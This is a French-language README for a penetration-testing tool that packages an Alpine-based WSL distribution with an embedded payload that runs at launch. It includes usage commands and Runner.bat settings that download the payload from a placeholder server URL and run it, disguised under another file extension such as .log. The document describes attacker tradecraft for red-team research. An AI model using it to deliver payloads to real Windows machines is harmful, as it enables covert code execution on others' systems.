
Un puissant script shell pour créer des distributions WSL (Windows Subsystem for Linux) personnalisées avec des payloads intégrés.
Cet outil est destiné à la recherche en sécurité légitime et aux tests d'intrusion. Les utilisateurs sont responsables de s'assurer qu'ils disposent de l'autorisation nécessaire avant de tester des systèmes qu'ils ne possèdent pas ou pour lesquels ils n'ont pas d'autorisation explicite.
Un script shell permettant de créer des distributions WSL (Windows Subsystem for Linux) minimales avec des payloads intégrés. Cet outil automatise le processus de construction de distributions WSL basées sur Alpine Linux pouvant exécuter des payloads personnalisés au lancement.
Le script Build_WSL_Payload.sh télécharge le rootfs Alpine Linux le plus récent, le personnalise pour une utilisation avec WSL, intègre un exécutable spécifié par l'utilisateur et empaquette le tout dans un fichier .wsl distribuable.
Le Runner.bat téléchargera le fichier de configuration WSL depuis l'URL fournie et le lancera (installera wsl s'il n'est pas présent et si les droits d'administrateur sont disponibles)
Cela est particulièrement utile pour les tests d'intrusion, la recherche en sécurité et la création d'environnements WSL personnalisés.
-N, --name: Spécifiez le nom de distribution par défaut pour WSL-P, --payload: Spécifiez le chemin vers le fichier exécutable du payload-H, --help: Affichez le menu d'aide# Build a WSL distribution named "CalcWSL" with a custom payload
./Build_WSL_Payload.sh -N CalcWSL -P ./Calc.exe
Option 1. Double-clic - Double-cliquer sur le fichier WSL exécutera le payload mais ouvrira également une invite cmd qui devra être fermée manuellement. (Non recommandé)
Option 2. Utilisez le fichier Runner.bat
C:\Users\USER_NAME> .\Runner.bat
Le script Runner.bat effectue automatiquement les opérations suivantes:
Modifiez les variables en haut de Runner.bat pour personnaliser:
set "DOWNLOAD_URL=https://your-server.com/payload.wsl"
set "WSL_FILE=payload.log" # Still testing but can use most file extensions here.
Ce projet s'inspire et s'appuie sur les recherches et techniques documentées dans le dépôt dmcxblue/WSL-Payloads, qui fournit des informations précieuses sur l'armement du format de fichier WSL et la recherche en sécurité.
Licence MIT
La permission est accordée, gratuitement, à toute personne obtenant une copie de ce logiciel et des fichiers de documentation associés (le « Logiciel »), de traiter le Logiciel sans restriction, y compris sans limitation les droits d'utiliser, de copier, de modifier, de fusionner, de publier, de distribuer, de sous-licencier et/ou de vendre des copies du Logiciel, et de permettre aux personnes à qui le Logiciel est fourni de le faire, sous réserve des conditions suivantes:
L'avis de droit d'auteur ci-dessus et cet avis de permission devront être inclus dans toutes les copies ou parties substantielles du Logiciel.
LE LOGICIEL EST FOURNI « TEL QUEL », SANS GARANTIE D'AUCUNE SORTE, EXPRESSE OU IMPLICITE, Y COMPRIS MAIS SANS S'Y LIMITER LES GARANTIES DE QUALITÉ MARCHANDE, D'ADÉQUATION À UN USAGE PARTICULIER ET D'ABSENCE DE CONTREFAÇON. EN AUCUN CAS, LES AUTEURS OU TITULAIRES DU DROIT D'AUTEUR NE SERONT RESPONSABLES DE TOUTE RÉCLAMATION, DOMMAGE OU AUTRE RESPONSABILITÉ, QUE CE SOIT DANS LE CADRE D'UNE ACTION CONTRACTUELLE, DÉLICTUELLE OU AUTRE, DÉCOULANT DE, OU EN RELATION AVEC, LE LOGICIEL OU L'UTILISATION OU AUTRES TRAITEMENTS DU LOGICIEL.